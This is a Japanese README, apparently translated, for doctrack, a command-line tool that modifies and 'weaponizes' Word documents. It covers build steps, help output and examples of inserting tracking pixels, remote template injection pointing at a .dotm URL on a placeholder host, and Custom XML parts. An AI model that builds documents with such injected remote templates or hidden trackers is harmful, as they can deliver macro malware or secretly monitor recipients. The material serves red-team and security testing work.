Office Open XML ドキュメントを操作および悪用するためのツール。
.Net 6.0 をダウンロードする必要があります。次に、Windows で単一のバイナリをビルドするには:
$ git clone https://github.com/wavvs/doctrack.git
$ cd doctrack/
$ dotnet publish -r win-x64 -c Release /p:PublishSingleFile=true
Linux の場合:
$ dotnet publish -r linux-x64 -c Release /p:PublishSingleFile=true
$ doctrack --help
Tool to manipulate and weaponize Office Open XML documents.
-i, --input Input filename. If doesn't exist, new file is created.
-o, --output Output filename. If not set, document is saved as --input
file.
-m, --metadata Metadata to supply (JSON file).
-u, --url URL to insert.
-e, --template (Default: false) If set, enables template URL injection.
-s, --inspect (Default: false) Inspect document.
-c, --custom-part Insert a Custom XML part (XML file)
--help Display this help screen.
Word 文書を作成し、文書メタデータを変更する:
$ doctrack -i test.docx -m metadata.json
トラッキングピクセルを挿入し、文書メタデータを変更する:
$ doctrack -i test.docx -o test.docx --metadata metadata.json --url http://test.url/image.png
リモートテンプレート URL を挿入する (別名 Remote Template Injection):
$ doctrack -i test.docx -o test.docx --url http://test.url/template.dotm --template
Custom XML パーツを挿入する:
$ doctrack -i test.docx -o test.docx -c part.xml
外部ターゲット URL、メタデータ、Custom XML パーツを検査する:
$ doctrack -i test.docx --inspect
[External targets]
Part: /word/document.xml, ID: R8783bc77406d476d, URI: http://test.url/image.png
Part: /word/settings.xml, ID: R33c36bdf400b44f6, URI: http://test.url/template.dotm
[Metadata]
Creator: wavvs
Title: doctrack
Subject:
Category:
Keywords:
Description:
ContentType:
ContentStatus:
Version:
Revision:
Created: 13.10.2020 23:20:39
Modified: 13.10.2020 23:20:39
LastModifiedBy:
LastPrinted: 13.10.2020 23:20:39
Language:
Identifier:
[CustomXML Parts]
Part: /customXML/item.xml (25 bytes)